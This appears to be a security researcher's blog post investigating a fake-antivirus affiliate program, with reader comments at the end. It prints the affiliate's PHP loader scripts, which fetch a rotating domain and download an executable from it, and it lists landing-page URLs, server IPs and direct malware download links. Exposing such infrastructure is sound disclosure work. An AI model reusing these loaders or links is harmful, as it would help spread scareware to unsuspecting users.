First contact the 24 Feb
Then recontact the 25, 6 and more seriously about business the 7 Mar:
9 Mar, loader operational.
"Marketing compagny" no name... no logo... look's like a private affiliate.
• dns: » ip: 188.72.248.141 - adresse: NET-WINTOOLS.BIZ
Login:
News:
Statistics:
Promo:
Statistics by promo:
Payement:
Profile:
FAQ:
load1.txt:
<?php
/*
* Получает ехе и записывает в файл
*
*/
$fileName="scanner.1";
$afid="you_afid"; // 1
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";
$actual_domain=file_get_contents($urlActualDomain);
if (!$actual_domain) my_error("Can't get domain.");
$exe_url="http://$actual_domain/ldpatch/softpatch.php?afid=".$afid;
$baka_exe=file_get_contents($exe_url);
if (strlen($baka_exe)> 0){
$h = fopen($fileName,"w");
fwrite($h,$baka_exe);
fclose($h);
echo "OK";
}else{
my_error("Can't get exe.");
}
exit;
////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
echo ("Update baka - Error:".$error_str."\r\n");
exit;
}
?>
/*
* Получает ехе и записывает в файл
*
*/
$fileName="scanner.1";
$afid="you_afid"; // 1
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";
$actual_domain=file_get_contents($urlActualDomain);
if (!$actual_domain) my_error("Can't get domain.");
$exe_url="http://$actual_domain/ldpatch/softpatch.php?afid=".$afid;
$baka_exe=file_get_contents($exe_url);
if (strlen($baka_exe)> 0){
$h = fopen($fileName,"w");
fwrite($h,$baka_exe);
fclose($h);
echo "OK";
}else{
my_error("Can't get exe.");
}
exit;
////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
echo ("Update baka - Error:".$error_str."\r\n");
exit;
}
?>
load2.txt:
<?php
/*
* Load2
* записает актуальный домен в файл
*
*/
$fileDomain="domain.1";
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";
$actual_domain =file($urlActualDomain);
if (sizeof($actual_domain)== 0 ) my_error("Can't get domain.");
$h = fopen($fileDomain,"w");
$text=implode("", $actual_domain);
fwrite($h,"http://".$text);
fclose($h);
echo "OK";
exit;
////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
echo ("Update baka - Error:".$error_str."\r\n");
exit;
}
////////////////////////////////////////////////////////////////////////////////
?>
/*
* Load2
* записает актуальный домен в файл
*
*/
$fileDomain="domain.1";
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";
$actual_domain =file($urlActualDomain);
if (sizeof($actual_domain)== 0 ) my_error("Can't get domain.");
$h = fopen($fileDomain,"w");
$text=implode("", $actual_domain);
fwrite($h,"http://".$text);
fclose($h);
echo "OK";
exit;
////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
echo ("Update baka - Error:".$error_str."\r\n");
exit;
}
////////////////////////////////////////////////////////////////////////////////
?>
load3.txt
<?php
/*
* Load3
* дописает к урл ( например /scanner15/?afid=3)
*/
$fileName="my_file.1";
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";
$h = fopen($fileName,"w");
$text = file($urlActualDomain);
$text=implode("", $text);
fwrite($h,"http://".$text."/scanner15/?afid=3");
fclose($h);
echo "OK";
exit;
?>
/*
* Load3
* дописает к урл ( например /scanner15/?afid=3)
*/
$fileName="my_file.1";
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";
$h = fopen($fileName,"w");
$text = file($urlActualDomain);
$text=implode("", $text);
fwrite($h,"http://".$text."/scanner15/?afid=3");
fclose($h);
echo "OK";
exit;
?>
This Affiliate spread actually Antivirus Protection (if you want the sample)
Landing pages:
• dns: 1 » ip: 31.184.234.89 - adresse: SPACEIN-WEB1.UNI.ME
http://spacein-web1.uni.me/monitor10/?www=465
http://spacein-web1.uni.me/monitor11/?www=465
http://spacein-web1.uni.me/monitor15/?www=465
• dns: 1 » ip: 46.21.159.175 - adresse: VIDEO-NKLPC1.TK
http://video-nklpc1.tk/xxx2/?www=465
http://video-nklpc1.tk/xxx5/?www=465
• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ3.TK
• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ4.TK
http://uber-scanpcxz3.tk/monitor10/?www=465
http://uber-scanpcxz3.tk/monitor11/?www=465
http://uber-scanpcxz3.tk/monitor15/?www=465
http://spacein-web1.uni.me/monitor10/?www=465
http://spacein-web1.uni.me/monitor11/?www=465
http://spacein-web1.uni.me/monitor15/?www=465
• dns: 1 » ip: 46.21.159.175 - adresse: VIDEO-NKLPC1.TK
http://video-nklpc1.tk/xxx2/?www=465
http://video-nklpc1.tk/xxx5/?www=465
• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ3.TK
• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ4.TK
http://uber-scanpcxz3.tk/monitor10/?www=465
http://uber-scanpcxz3.tk/monitor11/?www=465
http://uber-scanpcxz3.tk/monitor15/?www=465
Malware dowload:
• dns: 1 » ip: 83.149.112.46 - adresse: GOADVANCED-SOFTZ.IN
http://goadvanced-softz.in/sis/spch.php?www=465
http://goadvanced-softz.in/sis/in/out/465.exe
• dns: 1 » ip: 205.204.87.27 - adresse: WHITE-DOGGYSOFT.IN
http://white-doggysoft.in/sis/spch.php?www=465
http://white-doggysoft.in/sis/in/out/465.exe
http://white-doggysoft.in/soft/loader.exe
http://white-doggysoft.in/soft/installer_m.exe
http://goadvanced-softz.in/sis/spch.php?www=465
http://goadvanced-softz.in/sis/in/out/465.exe
• dns: 1 » ip: 205.204.87.27 - adresse: WHITE-DOGGYSOFT.IN
http://white-doggysoft.in/sis/spch.php?www=465
http://white-doggysoft.in/sis/in/out/465.exe
http://white-doggysoft.in/soft/loader.exe
http://white-doggysoft.in/soft/installer_m.exe
Also a weird string was found in the promo server: Projects/BakaSoft/wdd2010.com/promo_new/trunk/htdocs
Maybe it's the same program or maybe he payed the people of BakaSoft and they selled the system.
Index Of/
LOL at the 20mb file WTF how is that even possible.
ReplyDeleteit tries to look like a real av...
Delete